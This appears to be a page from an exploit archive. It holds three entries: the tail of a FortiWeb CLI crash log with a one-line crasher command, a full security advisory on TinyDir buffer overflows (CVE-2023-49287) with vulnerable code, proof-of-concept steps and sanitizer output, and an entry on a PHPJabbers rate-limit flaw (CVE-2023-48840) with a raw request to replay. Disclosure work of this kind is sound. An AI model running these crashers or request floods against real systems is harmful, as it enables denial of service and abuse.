2023-11-16 05:07:38 <004315> [0x00007fdd21329ae3] => /lib64/libconfd.so (cfg_backup+0x00000193) 2023-11-16 05:07:38 <004315> [0x00007fdd21329ae3] => /lib64/libconfd.so (cfg_backup+0x00000193) 2023-11-16 05:08:00 <004315> application cli 2023-11-16 05:08:00 <004315> *** signal Segmentation fault received *** 2023-11-16 05:08:00 <004315> RIP 00007fdd1febf284 2023-11-16 05:08:00 <004315> EFLAGS 0000000000010246 2023-11-16 05:08:00 <004315> RAX 0000000000000000 2023-11-16 05:08:00 <004315> RBX 0000000000000006 2023-11-16 05:08:00 <004315> RCX 00005642dd558a80 2023-11-16 05:08:00 <004315> RDX 00007ffca74d9030 2023-11-16 05:08:00 <004315> RSI ffffffffffffffc0 2023-11-16 05:08:00 <004315> RDI 00007ffca74d82d0 2023-11-16 05:08:00 <004315> RBP 0000000000000000 2023-11-16 05:08:00 <004315> RSP 00007ffca74d8208 2023-11-16 05:08:00 <004315> CS 0000 2023-11-16 05:08:00 <004315> GS 0000 2023-11-16 05:08:00 <004315> FS 0033 2023-11-16 05:08:00 <004315> Trap 000000000000000e 2023-11-16 05:08:00 <004315> Error 0000000000000006 2023-11-16 05:08:00 <004315> Oldmask 0000000000000000 2023-11-16 05:08:00 <004315> CR2 00007ffca74d9000 2023-11-16 05:08:00 <004315> [0x00007fdd1febf284] ==> /lib64/libc.so.6 + 0x000000000013d284) 2023-11-16 05:08:00 <004315> [0x00007fdd21329ae3] => /lib64/libconfd.so (cfg_backup+0x00000193) 2023-11-16 05:08:00 <004315> [0x00007fdd21329ae3] => /lib64/libconfd.so (cfg_backup+0x00000193) FortiWeb # ;; version: FortiWeb VM (v7.4.0 build577) ;; quick poc: fgweb_cli> execute backup cli-config tftp SOMEFILENAME 1.1.1.1 PASSWD_LEN_IS_OUR_CRASHER ;; ;; https://code610.blogspot.com/search?q=fortigate ;; </code></pre>

<pre><code>--[ HNS-2023-04 - HN Security Advisory - https://security.humanativaspa.it/ * Title: Buffer overflow vulnerabilities with long path names in TinyDir * Product: TinyDir <= 1.2.5 * Author: Marco Ivaldi <marco.ivaldi@hnsecurity.it> * Date: 2023-12-04 * CVE ID: CVE-2023-49287 * Severity: High - 7.7 - CVSS:3.1/AV:L/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H * Vendor URL: https://github.com/cxong/tinydir * Advisory URL: https://github.com/cxong/tinydir/security/advisories/GHSA-jf5r-wgf4-qhxf --[ 0 - Table of contents 1 - Summary 2 - Background 3 - Vulnerabilities 4 - Proof of concept 5 - Affected products 6 - Remediation 7 - Disclosure timeline 8 - Acknowledgements 9 - References --[ 1 - Summary "This is the OG we all want to be, congrats on 20yrs of (public) vulns!" -- Erik Cabetas TinyDir is a lightweight, portable and easy to integrate C directory and file reader. It wraps dirent for POSIX and FindFirstFile for Windows. We reviewed TinyDir's source code hosted on GitHub [1] and identified some security vulnerabilities that may cause memory corruption. Their impacts range from denial of service to potential arbitrary code execution. --[ 2 - Background While auditing another codebase, we noticed that it included TinyDir. Since this small but successful project is used in hundreds of repositories [2], we decided to review it in search of security bugs. --[ 3 - Vulnerabilities We spotted some buffer overflow vulnerabilities with long path names in the tinydir_file_open() function, at the marked locations in the following source code listing: ```c /* Open a single file given its path */ _TINYDIR_FUNC int tinydir_file_open(tinydir_file *file, const _tinydir_char_t *path) { tinydir_dir dir; int result = 0; int found = 0; _tinydir_char_t dir_name_buf[_TINYDIR_PATH_MAX]; _tinydir_char_t file_name_buf[_TINYDIR_FILENAME_MAX]; _tinydir_char_t *dir_name; _tinydir_char_t *base_name; #if (defined _MSC_VER || defined __MINGW32__) _tinydir_char_t drive_buf[_TINYDIR_PATH_MAX]; _tinydir_char_t ext_buf[_TINYDIR_FILENAME_MAX]; #endif if (file == NULL || path == NULL || _tinydir_strlen(path) == 0) { errno = EINVAL; return -1; } if (_tinydir_strlen(path) + _TINYDIR_PATH_EXTRA >= _TINYDIR_PATH_MAX) { errno = ENAMETOOLONG; return -1; } /* Get the parent path */ #if (defined _MSC_VER || defined __MINGW32__) #if ((defined _MSC_VER) && (_MSC_VER >= 1400)) errno = _tsplitpath_s( path, drive_buf, _TINYDIR_DRIVE_MAX, dir_name_buf, _TINYDIR_FILENAME_MAX, file_name_buf, _TINYDIR_FILENAME_MAX, ext_buf, _TINYDIR_FILENAME_MAX); #else _tsplitpath( path, drive_buf, dir_name_buf, file_name_buf, ext_buf); /* VULN: potential buffer overflow due to insecure splitpath() API (https://learn.microsoft.com/en-us/cpp/c-runtime-library/reference/splitpath-wsplitpath?view=msvc-170) */ #endif if (errno) { return -1; } /* _splitpath_s not work fine with only filename and widechar support */ #ifdef _UNICODE if (drive_buf[0] == L'\xFEFE') drive_buf[0] = '\0'; if (dir_name_buf[0] == L'\xFEFE') dir_name_buf[0] = '\0'; #endif /* Emulate the behavior of dirname by returning "." for dir name if it's empty */ if (drive_buf[0] == '\0' && dir_name_buf[0] == '\0') { _tinydir_strcpy(dir_name_buf, TINYDIR_STRING(".")); } /* Concatenate the drive letter and dir name to form full dir name */ _tinydir_strcat(drive_buf, dir_name_buf); dir_name = drive_buf; /* Concatenate the file name and extension to form base name */ _tinydir_strcat(file_name_buf, ext_buf); /* VULN: since sizeof(file_name_buf) + sizeof(ext_buf) is larger than sizeof(file_name_buf), we have a potential stack buffer overflow */ base_name = file_name_buf; #else _tinydir_strcpy(dir_name_buf, path); dir_name = dirname(dir_name_buf); _tinydir_strcpy(file_name_buf, path); /* VULN: since sizeof(file_name_buf) is smaller than the maximum path length, we have a potential stack buffer overflow */ base_name = basename(file_name_buf); #endif /* Special case: if the path is a root dir, open the parent dir as the file */ #if (defined _MSC_VER || defined __MINGW32__) if (_tinydir_strlen(base_name) == 0) #else if ((_tinydir_strcmp(base_name, TINYDIR_STRING("/"))) == 0) #endif { memset(file, 0, sizeof * file); file->is_dir = 1; file->is_reg = 0; _tinydir_strcpy(file->path, dir_name); file->extension = file->path + _tinydir_strlen(file->path); return 0; } /* Open the parent directory */ if (tinydir_open(&dir, dir_name) == -1) { return -1; } /* Read through the parent directory and look for the file */ while (dir.has_next) { if (tinydir_readfile(&dir, file) == -1) { result = -1; goto bail; } if (_tinydir_strcmp(file->name, base_name) == 0) { /* File found */ found = 1; break; } tinydir_next(&dir); } if (!found) { result = -1; errno = ENOENT; } bail: tinydir_close(&dir); return result; } ``` --[ 4 - Proof of concept Step-by-step instructions to replicate the third vulnerability on Linux: ``` $ git clone https://github.com/cxong/tinydir $ cd tinydir/samples/ $ gcc -g -fsanitize=address -I.. file_open_sample.c -o file_open_sample $ mkdir -p AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/ $ ./file_open_sample AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Path: ./AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Name: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA Extension: Is dir? yes Is regular file? no $ ./file_open_sample AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/ ================================================================= ==2533==ERROR: AddressSanitizer: stack-buffer-overflow on address 0x7ffd1ecabeb0 at pc 0x7f37b22544bf bp 0x7ffd1ecaac10 sp 0x7ffd1ecaa3b8 WRITE of size 513 at 0x7ffd1ecabeb0 thread T0 #0 0x7f37b22544be in __interceptor_strcpy ../../../../src/libsanitizer/asan/asan_interceptors.cpp:440 #1 0x5625cf301b69 in tinydir_file_open ../tinydir.h:711 #2 0x5625cf3021f4 in main /home/raptor/tinydir/samples/file_open_sample.c:12 #3 0x7f37b1e29d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58 #4 0x7f37b1e29e3f in __libc_start_main_impl ../csu/libc-start.c:392 #5 0x5625cf3004e4 in _start (/home/raptor/tinydir/samples/file_open_sample+0x24e4) Address 0x7ffd1ecabeb0 is located in stack of thread T0 at offset 4704 in frame #0 0x5625cf3018c3 in tinydir_file_open ../tinydir.h:641 This frame has 3 object(s): [48, 4184) 'dir' (line 642) [4448, 4704) 'file_name_buf' (line 646) [4768, 8864) 'dir_name_buf' (line 645) <== Memory access at offset 4704 partially underflows this variable HINT: this may be a false positive if your program uses some custom stack unwind mechanism, swapcontext or vfork (longjmp and C++ exceptions *are* supported) SUMMARY: AddressSanitizer: stack-buffer-overflow ../../../../src/libsanitizer/asan/asan_interceptors.cpp:440 in __interceptor_strcpy Shadow bytes around the buggy address: 0x100023d8d780: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100023d8d790: 00 00 00 00 00 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 0x100023d8d7a0: f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 f2 0x100023d8d7b0: f2 f2 f2 f2 f2 f2 00 00 00 00 00 00 00 00 00 00 0x100023d8d7c0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 =>0x100023d8d7d0: 00 00 00 00 00 00[f2]f2 f2 f2 f2 f2 f2 f2 00 00 0x100023d8d7e0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100023d8d7f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100023d8d800: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100023d8d810: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0x100023d8d820: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Shadow byte legend (one shadow byte represents 8 application bytes): Addressable: 00 Partially addressable: 01 02 03 04 05 06 07 Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb ASan internal: fe Left alloca redzone: ca Right alloca redzone: cb Shadow gap: cc ==2533==ABORTING ``` --[ 5 - Affected products TinyDir 1.2.5 and earlier versions are affected by the vulnerabilities discussed in this advisory. --[ 6 - Remediation TinyDir developers have released version 1.2.6 [3] that addresses the vulnerabilities discussed in this advisory. Please check the official TinyDir channels for further information about fixes. --[ 7 - Disclosure timeline 2023-11-30: Vulnerabilities reported via GitHub security advisories [4]. 2023-12-01: Proof of concept provided at the request of TinyDir developers. 2023-12-02: Vulnerabilities fixed in TinyDir's master branch on GitHub. 2023-12-03: TinyDir 1.2.6 released and GitHub advisory published. 2023-12-04: GitHub issued CVE-2023-49287 and we published this advisory. --[ 8 - Acknowledgements We would like to thank TinyDir developers for triaging and quickly fixing the reported vulnerabilities. --[ 9 - References [1] https://github.com/cxong/tinydir [2] https://github.com/search?q=tinydir.h&type=code [3] https://github.com/cxong/tinydir/releases/tag/1.2.6 [4] https://github.com/cxong/tinydir/security Copyright (c) 2023 Marco Ivaldi and Humanativa Group. All rights reserved. </code></pre>

<pre><code># Exploit Title: PHPJabbers Apointment Scheduler v3.0 - No Rate Limit in Email # Date: 19/11/2023 # Exploit Author: BugsBD Limited # Discover by: Rahad Chowdhury # Vendor Homepage: https://www.phpjabbers.com/ # Software Link: https://www.phpjabbers.com/appointment-scheduler/ # Version: v3.0 # Tested on: Windows 10, Windows 11, Linux # CVE-2023-48840 Descriptions: PHPJabbers Apointment Scheduler v3.0 is vulnerable to Rate limiting. Rate limiting is implemented in web applications and APIs to prevent abuse, such as brute-force attacks or excessive requests that could lead to resource exhaustion. When a rate limit is bypassed or not properly enforced, it opens the door for attackers to carry out malicious activities more quickly than intended, potentially leading to unauthorized access, data breaches, or service disruption. Steps to Reproduce: 1. Request Data: POST /1701529051_590/index.php?controller=pjBaseOptions&action=pjActionAjaxSend HTTP/1.1 Host: demo.phpjabbers.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0 Accept: */* Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded; charset=UTF-8 X-Requested-With: XMLHttpRequest Content-Length: 426 Origin: https://demo.phpjabbers.com Referer: https://demo.phpjabbers.com/1701529051_590/index.php?controller=pjBaseOptions&action=pjActionEmailSettings Sec-Fetch-Dest: empty Sec-Fetch-Mode: cors Sec-Fetch-Site: same-origin Te: trailers Connection: close options_update=1&next_action=pjActionEmailSettings&email=test1%40test.com&value-enum-o_send_email=mail%7Csmtp%3A%3Amail&value-string-o_smtp_host=&value-int-o_smtp_port=25&value-string-o_smtp_user=&value-string-o_smtp_pass=&value-enum-o_smtp_secure=none%7Cssl%7Ctls%3A%3Anone&value-enum-o_smtp_auth=LOGIN%7CPLAIN%3A%3ALOGIN&value-string-o_smtp_sender=&value-string-o_sender_email=test%40test.com&value-string-o_sender_name=Test 2. Send it to intruder and configure then Start Attack and check mail. ## Reproduce: [href](https://github.com/bugsbd/CVE/tree/main/2023/CVE-2023-48840) </code></pre>